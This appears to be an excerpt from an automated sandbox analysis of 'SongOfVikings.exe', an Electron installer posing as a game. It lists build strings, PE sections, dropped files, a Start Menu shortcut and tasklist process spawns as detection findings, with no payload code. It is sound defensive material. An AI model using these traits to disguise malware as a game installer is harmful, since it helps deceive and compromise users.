Source:	Binary string: C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: LTCOMPILE = $(TCC) -Fo$@ -Fd$*.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLEANFILES="$CLEANFILES .lib .dll .pdb .exp" source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /OUT:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.NODE" /INCREMENTAL:NO /NOLOGO KERNEL32.LIB USER32.LIB GDI32.LIB WINSPOOL.LIB COMDLG32.LIB ADVAPI32.LIB SHELL32.LIB OLE32.LIB OLEAUT32.LIB UUID.LIB ODBC32.LIB DELAYIMP.LIB "C:\\USERS\\SERC\\.ELECTRON-GYP\\24.8.8\\X64\\NODE.LIB" DELAYIMP.LIB /DELAYLOAD:NODE.EXE /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB" /OPT:REF /OPT:ICF /TLBID:1 /DYNAMICBASE /NXCOMPAT /MACHINE:X64 /LTCG:INCREMENTAL /ignore:4199 /DLL RELEASE\OBJ\NODE_SQLITE3\WIN_DELAY_LOAD_HOOK.OBJ source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| *.dSYM ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\NODE-GYP\SRC\WIN_DELAY_LOAD_HOOK.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: SQLITE3EXEPDB = /pdb:sqlite3sh.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdb source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: -typedil-fC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\node-gyp\src\win_delay_load_hook.cc-dos-Zi-Z7-W3-pdbrpc-Og-Ob2-Ot-EHs-MT-GS-Gy-FitObjFunc-FitObjData-NoRTTI-FoC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\deps\Release\obj\sqlite3\win_delay_load_hook.obj-FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb-errorreport:queue source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\electron.exe.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBVCRUNTIME.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BCC = $(NCC) -nologo -W4 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1902908317.00000000051B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\BACKUP.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\BACKUP.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\STATEMENT.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\STATEMENT.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCPMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\DATABASE.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\DATABASE.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0. source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1834103716.0000000005A90000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1833977942.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1835988710.0000000005AD0000.00000004.00001000.00020000.00000000.sdmp

PE file contains sections with non-standard names

Source: SongOfVikings.exe.0.dr	Static PE information: section name: .00cfg
Source: SongOfVikings.exe.0.dr	Static PE information: section name: .gxfg
Source: SongOfVikings.exe.0.dr	Static PE information: section name: .retplne
Source: SongOfVikings.exe.0.dr	Static PE information: section name: .rodata
Source: SongOfVikings.exe.0.dr	Static PE information: section name: CPADinfo
Source: SongOfVikings.exe.0.dr	Static PE information: section name: LZMADEC
Source: SongOfVikings.exe.0.dr	Static PE information: section name: _RDATA
Source: SongOfVikings.exe.0.dr	Static PE information: section name: malloc_h
Source: ffmpeg.dll.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr	Static PE information: section name: _RDATA
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .00cfg
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .gxfg
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .retplne
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .rodata
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: CPADinfo
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: LZMADEC
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: _RDATA
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr	Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr	Static PE information: section name: _RDATA
Source: f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node.5.dr	Static PE information: section name: _RDATA
Source: db56a95c-619a-410d-ad51-8448947b0929.tmp.node.5.dr	Static PE information: section name: _RDATA

Drops PE files

Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\SongOfVikings.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node			Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node			Jump to dropped file

Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\LICENSE.electron.txt			Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\SongOfVikings.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SongOfVikings.lnk

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
